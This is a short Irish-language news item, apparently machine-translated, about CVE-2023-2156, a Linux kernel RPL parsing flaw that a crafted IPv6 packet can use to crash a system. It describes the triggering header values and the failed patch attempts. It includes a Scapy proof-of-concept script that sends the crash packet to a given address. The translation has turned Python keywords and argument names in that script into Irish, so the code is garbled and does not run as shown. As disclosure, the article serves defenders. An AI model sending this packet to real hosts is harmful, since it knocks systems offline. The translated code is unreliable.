Nochtadh sonraí faoi leochaileacht neamhphaisteáilte (0 lá) (CVE-2023-2156) sa chroílár. Linux, rud a ligeann do chóras a bheith stoptha trí phaicéid IPv6 atá saindeartha a sheoladh (pacáiste báis). Ní tharlaíonn an fhadhb ach amháin nuair a chuirtear tacaíocht ar fáil don Prótacal Ródaithe do Líonraí Ísealchumhachta agus Caillteanais (RPL), atá díchumasaithe de réir réamhshocraithe i ndáiltí agus a úsáidtear go príomha ar fheistí leabaithe a oibríonn ar líonraí gan sreang a bhfuil caillteanas paicéad ard acu.
Tá an leochaileacht mar gheall ar phróiseáil mícheart sonraí seachtracha i gcód parsála an phrótacail RPL, rud a fhágann go bhfuil teip ar dhearbhú agus an eithne ag dul isteach sa stát scaoll. Nuair a chuirtear na sonraí a fhaightear ó pharsáil ceanntásc an phacéid IPv6 RPL sa struchtúr k_buff (Socket Maolán), má tá an réimse CmprI socraithe go 15, an réimse Segleft go 1, agus CmprE go 0, dí-chomhbhrúitear an veicteoir 48-beart le seoltaí. go 528 beart agus dealraíonn sé nach leor an chuimhne a leithdháiltear don mhaolán. Sa chás seo, déanann an fheidhm skb_push, a úsáidtear chun sonraí a bhrú isteach sa struchtúr, seiceáil ar neamh-chomhsheasmhacht idir méid na sonraí agus an maolán, ag giniúint staid scaoll chun cosc a chur ar scríobh thar an teorainn maolánach.
Sampla leas a bhaint as: # Bainfidh muid úsáid as Scapy chun an paicéad a dhéanamh ó iompórtáil scapy.all * soicéad iompórtála # Úsáid an IPv6 ó do chomhéadan LAN DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Úsáidimid soicéid chun an paicéad a sheoladh sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Craft the paicéad # Cineál = 3 déanann sé seo mar phaicéad RPL # Seoltaí tá 3 sheoladh, ach toisc go bhfuil CmprI 15, # tá gach octet den chéad dá sheoladh láimhseáilte mar sheoladh comhbhrúite # Segleft = 1 chun an t-aimpliú a spreagadh # lastentry = socraíonn 0xf0 CmprI go 15 agus CmprE go 0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(type=3, seoltaí=[“a8: :", "a7::", "a6::"], segleft=1, lastentry=0xf0) # Seol an paicéad olc seo sockfd.sendto(bytes(p), (DST_ADDR, 0))
Is fiú a thabhairt faoi deara gur cuireadh an leochaileacht in iúl do na forbróirí eithne ar ais i mí Eanáir 2022 agus le 15 mhí anuas tá iarracht déanta acu an fhadhb a réiteach trí huaire, ag scaoileadh paistí i mí Mheán Fómhair 2022, Deireadh Fómhair 2022 agus Aibreán 2023, ach gach uair a rinneadh na réitigh. ní leor agus níorbh fhéidir an leochaileacht a atáirgeadh. I ndeireadh na dála, chinn an tionscadal ZDI, a chomhordaigh an obair chun an leochaileacht a shocrú, faisnéis mhionsonraithe a scaoileadh faoin leochaileacht gan fanacht le socrú oibre a bheith ar fáil san eithne.
Mar sin, tá an leochaileacht fós gan socrú. Go háirithe, tá an paiste atá san áireamh sa eithne 6.4-rc2 neamhéifeachtach. Moltar d'úsáideoirí seiceáil nach n-úsáidtear an prótacal RPL ar a gcórais, rud is féidir a dhéanamh leis an ordú sysctl -a | grep -i rpl_seg_chumasaithe
Foinse: oscailtenet.ru
